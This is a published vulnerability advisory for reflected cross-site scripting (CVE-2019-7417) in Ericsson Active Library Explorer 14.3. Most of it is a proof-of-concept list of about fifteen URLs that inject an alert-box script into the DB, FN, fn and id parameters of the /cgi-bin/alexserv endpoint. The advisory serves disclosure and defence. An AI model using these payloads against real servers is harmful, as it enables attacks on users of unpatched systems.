Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

2019.02.11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

<!-- # Exploit Title: Cross Site Scripting in Ericsson Active Library Explorer Server Version 14.3 # Date: 23-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.ericsson.com # Software Link: http://www.ericsson.com # Version: Ericsson Active Library Explorer Server Version 14.3 # Tested on: all # CVE : CVE-2019-7417 # Category: webapps 1. Description XSS exists in Ericsson Active Library Explorer (ALEX) 14.3 in multiple parameters in the "/cgi-bin/alexserv" servlet, as demonstrated by the DB, FN, fn, or id parameter. Active Library Explorer (ALEX) is server-based software that enables users to browse Ericsson document libraries and documents with a standard web browser. It consists of the following two parts, which are typically used in two different web browser windows: Library View a this part contains functions for accessing libraries within a folder structure. For example, it is possible to search for libraries, download libraries, or compare library variants. It is also possible to start a search for documents in several libraries at the same time. Document View a this part contains functions for accessing documents inside a library. For example, it is possible to search for documents or within documents in individual libraries, and to print or bookmark documents. 2. Proof of Concept URL http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter fn=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter id=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt Parameter id=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=23034&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter fn=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=hlex_help.html Parameter ID=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter FN=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=alex.html Parameter DB=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter FN=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter FN=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&ac=image&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter fn=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=alex_help.ahx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&CH=LibraryBrowser Parameter FN=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=12446-2885Uen.E.html Parameter DB=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&AC=image&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter FN=<SCRIPT>alert("XSS");</SCRIPT> URL http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=help.html&CH=LibraryBrowser Parameter DB=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top